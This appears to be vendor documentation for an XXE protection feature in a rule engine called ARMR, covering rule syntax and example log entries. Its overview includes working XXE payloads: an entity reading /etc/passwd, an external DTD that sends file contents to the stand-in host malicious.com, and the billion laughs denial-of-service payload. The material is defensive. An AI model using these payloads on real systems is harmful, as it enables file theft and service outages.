XXE
Overview
An XML External Entity (XXE) attack can occur in an application that reads in and processes XML. While this attack could potentially happen by reading in local XML files, this particular kind of attack is more common when the XML comes from a remote source, which is quite often the case with web applications. If an attacker knows that XML can be sent to an endpoint where it will be processed, the attacker can send an XML payload that could make the application perform server side request forgery, read files from the local file-system, or even cause denial-of-service attacks.
XXE attacks are made possible through the use of the Document Type Definition (DTD). DTD is intended to be a way to define the legal building blocks of an XML document. This is done by defining elements and entities. Entities are commonly used to define constant values that can be referenced within the XML. DTD can be defined locally or by importing a .dtd
file from a SYSTEM (local) or PUBLIC (remote) source.
XML Components
student.xml
Notice the use of the medal1
general entity which is referenced in the XML body as &medal1;
. This is known as a general entity reference. There are also parameter entities, which have a very similar syntax, and can be referenced using the %entity;
syntax rather than the &entity;
syntax.
In the example shown here, the DTD is embedded within the XML document itself. The DTD provides a definition of all of the legal building blocks of the XML, which the XML body is abiding by. It is also possible to move the DTD section to an external source as a local file or on a remote server. In this case, the XML could be updated to point to the external source.
students.dtd
<!ELEMENT students (student*)>
<!ELEMENT student (id, firstname, lastname, gpa)>
<!ELEMENT id (#PCDATA)>
<!ELEMENT gpa (#PCDATA)>
<!ENTITY medal1 "🥇">
Local File - SYSTEM
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE students SYSTEM "students.dtd">
<students>
...
</students>
Remote Server - PUBLIC
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE students PUBLIC "http://campus.com/dtds/students.dtd">
<students>
...
</students>
XXE Attacks
In order for an XXE attack to happen, the attacker needs to include a Document Type Definition (DTD). Without it, it is not possible to perform an attack of this nature. A common scenario where XXE can arise is with web applications that receive HTTP POST requests with XML in the body. In such cases, the application generally does not require the posted XML to include a DTD section in the prolog. It is not even necessary to supply an XML declaration. So it may come as a surprise that an attacker can intercept an HTTP request, and change the body of the request to purposely include these components. Once the amended XML is processed by the application, the XML parser/processor will handle the DTD provided by the attacker and perform the requested actions such as processing external entities or evaluating entity references.
Local File Inclusion Example
HTTP POST Request
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
In this classic example, the attacker is using a general external ENTITY
declaration named xxe
to get access to a local file on the server using the file://
protocol via the inclusion of the SYSTEM
keyword. In this case, the file being accessed is /etc/passwd
. Using the entity reference &xxe;
in the XML body, the reference is expanded with the contents of the file. Depending on the logic of application, it is possible that HTTP response will be returned to the attacker with the contents of the file. As we can see, the file being accessed has nothing to do with an entity definition, or DTD in general, but the system will try to access this file as requested.
Server Side Request Forgery Example
HTTP POST Request
<?xml version="1.0" ?>
<!DOCTYPE hack [
<!ENTITY % xxe SYSTEM 'http://malicious.com/dtds/xxe.dtd'>
%xxe;
%bravo;
]>
<hack>&charlie;</hack>
xxe.dtd
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % bravo "<!ENTITY charlie SYSTEM 'http://malicious.com/xxe/get?d=%data;'>">
In this example, the attacker hosts and controls the remote xxe.dtd
file, located at http://malicious.com/dtds/xxe.dtd
. The attacker also controls an endpoint where data can be received, located at http://malicious.com/xxe/get
, which takes a url parameter of d
that will have the victim's data assigned to it.
When the attacker sends the malicious XML to the victim's server, the XML parser/processor will first download the malicious xxe.dtd
file that contains the new parameter ENTITY
definitions of data
and bravo
. The bravo
parameter declares a value, which is actually a general external ENTITY
called charlie
, which contains a URL back to the attacker's server. Notice that the URL parameter d
is assigned a parameter entity reference of %data
, which points directly to the /etc/passwd
file.
Returning to the XML that was posted to the victim's server, the DTD makes references to the new components in xxe.dtd
, which will include them in the DTD, including the general entity named charlie
. Unlike parameter entities, general entities can be referenced in the XML body. Once the &charlie;
reference is processed, the chain of events happens. The file /etc/passwd
is read, and an HTTP request is made back to the attacker's server with the contents of the file.
Denial of Service Example
HTTP POST Request
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
In this example, the attacker doesn’t use any external components. Instead the idea is to cause the application to struggle and crash through the use of an overwhelming amount of general entity references. The very first entity, lol
, is assigned the value "lol"
. The subsequent entities are chained, with each entity referencing the previous entity ten times.
When the entity reference &lol9;
is processed in the XML body, the result of this chain will cause the original lol
entity to be referenced one billion times. This will cause the original value of "lol"
, which is three characters in length, to expand to a string of three billion characters. This is famously known as the billion laughs attack.
XXE Protection
While different XML parsers do offer users the ability to define configuration that will provide protection against XXE attacks, protection is generally not active by default. Older systems, including older versions of Java, have faulty XML parser/processor implementations, and may not honour the security configuration even if it were provided.
The XXE security feature addresses attacks, regardless of Java version or XML parser, by enforcing a strict policy of what the XML can contain. There are two main parameters that can be configured in the XXE security feature. All configuration is optional, and is only required if it is necessary to relax the rule for certain scenarios.
Given (Condition)
There are no specific conditions under which XXE protection is configured.
When (Event)
Keyword | Description |
---|---|
xxe | The keyword xxe is one of two components that must be supplied in the marshal rule with only one being allowed to be configured in a single rule. uri and reference are the only parameters accepted. |
Parameter | Description |
---|---|
uri | Only available in allow mode. An array of SYSTEM or PUBLIC URIs/URLs, declared within the DTD, that are required to be allowed. |
reference | Only available in protect mode. Defines two (optional) limits;- limit : The number of general entity references allowed before the ARMR marshal rule triggers. - expansion-limit : The expanded string length that can be used before the protection triggers.- Both limits are optional. Default value for any omitted parameter is 0. - It is valid to specify non-default values for one, or both, of these limits in the rule's reference parameter. For example;xxe(reference: {limit: 5, expansion-limit: 50}) xxe(reference: {limit: 8}) xxe(reference: {expansion-limit: 70}) |
Then (Action)
protect | When the rule triggers, the application is prevented from parsing / processing the XML, therefore obviating the XXE attack vector. If configured, a log message is generated with details of the event. |
detect | Monitoring mode: the application behaves as normal. A log message is generated with details of the event. A log message must be specified with this action. |
allow | An attempt that would otherwise be considered as an attack has been allowed, and the application will continue as normal. If configured, a log message is generated with details of the event. With this action, the uri parameter must be used to define a list of allowed URIs/URLs. |
As part of the action statement, the user may optionally specify the parameter stacktrace: “full”
. When this parameter is specified, the stacktrace of the location of the attempted exploit is included in the security log entry.
Rule Configuration
Protect Example
app("XXE SECURITY POLICY"):
requires(version: ARMR/2.7)
marshal("XXE:PROTECT"):
xxe()
protect(message: "An XXE attack has been blocked", severity: high)
endmarshal
endapp
The above protect
example provides the simplest and most restrictive configuration of the rule. Notice that the optional reference
parameter is not provided. This means than 0 entity references are allowable and neither are string expansions arising from entity references. The uri
parameter is not available to use in the protect
configuration. All URIs are blocked by default. Any URI that needs to be allowed must be configured in an allow
rule.
app("XXE SECURITY POLICY"):
requires(version: ARMR/2.7)
marshal("XXE:PROTECT"):
xxe(reference: {limit: 5, expansion-limit: 50})
protect(message: "An XXE attack has been blocked", severity: high)
endmarshal
endapp
In this protect
example, the rule is relaxed slightly for cases where a handful of entity references are required. Notice that the reference
parameter has been configured with a limit
of 5, and a string expansion-limit
of 50. Any XML that tries to make use of more entity references or would expand a reference to a string length greater than 50 characters will not be processed.
Detect Example
app("XXE SECURITY POLICY"):
requires(version: ARMR/2.7)
marshal("XXE:DETECT"):
xxe()
detect(message: "An XXE attack has been detected", severity: high)
endmarshal
endapp
The detect
action is a good way to see how an application responds to the XXE security feature before putting the rule into protect
mode. Any alerts produced as a consequence of the rule will be reported in the security log file but the application will continue to run as normal. This gives application owners the ability to review and evaluate any potential issues so the rule can be tuned to meet their needs. This is particularly true of applications that read in XML configuration during application startup.
Allow Example
app("XXE SECURITY POLICY"):
requires(version: ARMR/2.7)
marshal("XXE:ALLOW"):
xxe(uri: ["http://struts.apache.org/dtds/struts-2.3.dtd",
"http://struts.apache.org/dtds/struts-2.5.dtd",
"http://java.sun.com/dtd/web-jsptaglibrary_1_2.dtd",
"http://java.sun.com/j2ee/dtds/web-jsptaglibrary_1_1.dtd"])
allow(message: "An external DTD URI has been allowed")
endmarshal
endapp
The allow
action is used in conjunction with a secondary XXE rule configured with a protect
action. A rule configured with the allow
action gives application owners the ability to permit certain URIs defined in the XML to be accessed. Changing the XXE rule configured with an action of protect
to detect
will help identify any URIs that may need to be allowed. Once identified, the uri
parameter can be configured to allow only those specific URIs. Attempts to access URIs outside of the list will be blocked.
Logging
Protect Example
<10>1 2022-02-18T12:51:22.449Z fedora java 226858 - - CEF:0|ARMR:ARMR|ARMR|2.7|XXE :PROTECT|Execute Rule|High|internalHttpRequestUri=/customer/add reason=The XML is using an external source: SYSTEM file:///etc/passwd procid=226858 dvchost=fedora localIpAddress=127.0.0.1 payload=<!-- <msg>hi</msg> -->\n\n<!DOCTYPE test\n [\n <!ELEMENT xxe ANY>\n <!ENTITY xxe SYSTEM "file:///etc/passwd">\n ]\n>\n<forum>\n <username>2.2.4.RELEASE</username>\n <message>&xxe;</message>\n</forum> httpRequestUri=/oval/api/vuln/xml httpRequestMethod=GET msg=An XXE attack has been blocked! ruleType=marshal appVersion=1 securityFeature=marshal external xml entity protection remoteIpAddress=127.0.0.1 rt=Feb 18 2022 12:51:22.449 +0000 act=protect
This log message shows that triggering the external SYSTEM URI of file:///etc/passwd
has been blocked.
<10>1 2022-02-18T12:52:56.167Z fedora java 226858 - - CEF:0|ARMR:ARMR|ARMR|2.7|XXE :PROTECT|Execute Rule|High|internalHttpRequestUri=/customer/add reason=The XML entity 'lol1' is referenced: 10 time(s) in the XML DTD. The rule is configured with a reference limit of: 5 procid=226858 dvchost=fedora localIpAddress=127.0.0.1 payload=<?xml version\="1.0"?>\n<!DOCTYPE lolz\n [\n <!ELEMENT lolz (#PCDATA)>\n <!ENTITY lol "lol">\n <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\n <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">\n <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">\n <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">\n <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">\n <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">\n <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">\n <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">\n <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">\n ]\n>\n<lolz>&lol9;</lolz> httpRequestUri=/oval/api/vuln/xml httpRequestMethod=GET msg=An XXE attack has been blocked! ruleType=marshal appVersion=1 securityFeature=marshal external xml entity protection remoteIpAddress=127.0.0.1 rt=Feb 18 2022 12:52:56.166 +0000 act=protect
This log message shows that there are too many entity references, surpassing the configured limit of 5.
<10>1 2022-02-18T12:54:13.931Z fedora java 226858 - - CEF:0|ARMR:ARMR|ARMR|2.7|XXE :PROTECT|Execute Rule|High|internalHttpRequestUri=/customer/add reason=The XML has a circular reference: 'aaa' procid=226858 dvchost=fedora localIpAddress=127.0.0.1 payload=<?xml version\="1.0"?>\n<!DOCTYPE lolz [\n <!ELEMENT lolz (#PCDATA)>\n <!ENTITY aaa "&ccc;">\n <!ENTITY bbb "&aaa;">\n <!ENTITY ccc "&bbb;">\n ]>\n<lolz>&aaa;</lolz> httpRequestUri=/oval/api/vuln/xml httpRequestMethod=GET msg=An XXE attack has been blocked! ruleType=marshal appVersion=1 securityFeature=marshal external xml entity protection remoteIpAddress=127.0.0.1 rt=Feb 18 2022 12:54:13.931 +0000 act=protect
This log message shows that circular entity references have been disallowed.
Detect Example
<10>1 2022-02-18T13:23:18.741Z localhost java 4414 - - CEF:0|ARMR:ARMR|ARMR|2.7|XXE:DETECT|Execute Rule|High|msg=A potential XXE attack has been detected! Please review. reason=The XML is using an external source: PUBLIC http://www.bea.com/servers/wls810/dtd/weblogic810-ra.dtd rt=Feb 18 2022 13:23:18.741 +0000 appVersion=1 act=detect payload=<?xml version\="1.0"?>\n\n<!DOCTYPE weblogic-connection-factory-dd PUBLIC '-//BEA Systems, Inc.//DTD WebLogic 9.0.0 Connector//EN' 'http://www.bea.com/servers/wls810/dtd/weblogic810-ra.dtd'>\n\n<weblogic-connection-factory-dd>\n\n <connection-factory-name>WLSJMSInternalConnectionFactoryNoTX</connection-factory-name>\n <jndi-name>eis/jms/internal/WLSConnectionFactoryJNDINoTX</jndi-name>\n <pool-params>\n <initial-capacity>0</initial-capacity>\n <max-capacity>100</max-capacity>\n </pool-params>\n <use-connection-proxies>false</use-connection-proxies>\n\n</weblogic-connection-factory-dd> dvchost=localhost ruleType=marshal procid=4414 securityFeature=marshal external xml entity protection
This log message shows that an the external PUBLIC URI of http://www.bea.com/servers/wls810/dtd/weblogic810-ra.dtd
has been configured within the XML being processed. Reviewing this information, we can make a determination if that external DTD file is safe to access. In this case, the WebLogic application server appears to depend on this dtd file so allowing it may be necessary. It is of course possible to review the contents of the dtd file at the stated URL to validate what level of risk it poses.
<10>1 2022-02-18T13:21:27.681Z localhost java 4197 - - CEF:0|ARMR:ARMR|ARMR|2.7|XXE:DETECT|Execute Rule|High|msg=A potential XXE attack has been detected! Please review. reason=The XML body is using entity references '1 time(s). The rule is configured with a reference limit of: 0 rt=Feb 18 2022 13:21:27.681 +0000 appVersion=1 act=detect payload=<?xml version\="1.0" encoding\="UTF-8"?>\n<Policy xmlns\="urn:oasis:names:tc:xacml:2.0:policy:schema:os" PolicyId\="urn:bea:xacml:2.0:entitlement:resource:type@E@Furl@G@M@Oapplication@Ewls-management-services@M@OcontextPath@E@Umanagement@M@Ouri@E@Uweblogic@U@K@M@OhttpMethod@EOPTIONS" RuleCombiningAlgId\="urn:oasis:names:tc:xacml:1.0:rule-combining-algorithm:first-applicable"><Description>?weblogic.entitlement.rules.UncheckedPolicy()</Description><Target><Resources><Resource><ResourceMatch MatchId\="urn:oasis:names:tc:xacml:1.0:function:string-equal"><AttributeValue DataType\="http://www.w3.org/2001/XMLSchema#string">type\=<url>, application\=wls-management-services, contextPath\=/management, uri\=/weblogic/*, httpMethod\=OPTIONS</AttributeValue><ResourceAttributeDesignator AttributeId\="urn:oasis:names:tc:xacml:2.0:resource:resource-ancestor-or-self" DataType\="http://www.w3.org/2001/XMLSchema#string" MustBePresent\="true"/></ResourceMatch></Resource></Resources></Target><Rule RuleId\="unchecked-policy" Effect\="Permit"></Rule></Policy> dvchost=localhost ruleType=marshal procid=4197 securityFeature=marshal external xml entity protection
This log message shows that the XML being processed identified a reference 1 time. Reviewing the contents of the XML will help determine if in this scenario the use of a single entity reference posses any risk. As mentioned in the section on Denial of Service, general entity references can become dangerous when many are chained together.
Allow Example
<13>1 2022-02-18T13:44:50.051Z localhost java 5308 - - CEF:0|ARMR:ARMR|ARMR|2.7|XXE:ALLOW|Execute Rule|Unknown|msg=An external URI has been allowed. reason=The XML is using an external source: PUBLIC http://www.bea.com/servers/wls810/dtd/weblogic810-ra.dtd rt=Feb 18 2022 13:44:50.051 +0000 appVersion=1 act=allow payload=<?xml version\="1.0"?>\n\n<!DOCTYPE weblogic-connection-factory-dd PUBLIC '-//BEA Systems, Inc.//DTD WebLogic 9.0.0 Connector//EN' 'http://www.bea.com/servers/wls810/dtd/weblogic810-ra.dtd'>\n\n<weblogic-connection-factory-dd>\n\n <connection-factory-name>WLSJMSInternalConnectionFactoryNoTX</connection-factory-name>\n <jndi-name>eis/jms/internal/WLSConnectionFactoryJNDINoTX</jndi-name>\n <pool-params>\n <initial-capacity>0</initial-capacity>\n <max-capacity>100</max-capacity>\n </pool-params>\n <use-connection-proxies>false</use-connection-proxies>\n\n</weblogic-connection-factory-dd> dvchost=localhost ruleType=marshal procid=5308 securityFeature=marshal external xml entity protection
This log message shows the result of an XXE configured with an allow
action, and with a message
parameter. A security log entry is generated for the URI that has been allowed, which in this case is the external PUBLIC URI of http://www.bea.com/servers/wls810/dtd/weblogic810-ra.dtd
.
Logging On/Off Example
app("XXE SECURITY POLICY"):
requires(version: ARMR/2.7)
marshal("XXE:PROTECT"):
xxe()
protect(message: "", severity: high)
endmarshal
marshal("XXE:ALLOW"):
xxe(uri: ["http://struts.apache.org/dtds/struts-2.3.dtd"])
allow(severity: low)
endmarshal
endapp
In the above example, logging is switched ON in the protect
rule by the inclusion of the protect action message
attribute. As the message
attribute is defined as an empty string (""
), a default message will be included in the security event msg
extension. Logging is switched OFF in the allow
rule, by the omission of the allow action message
attribute.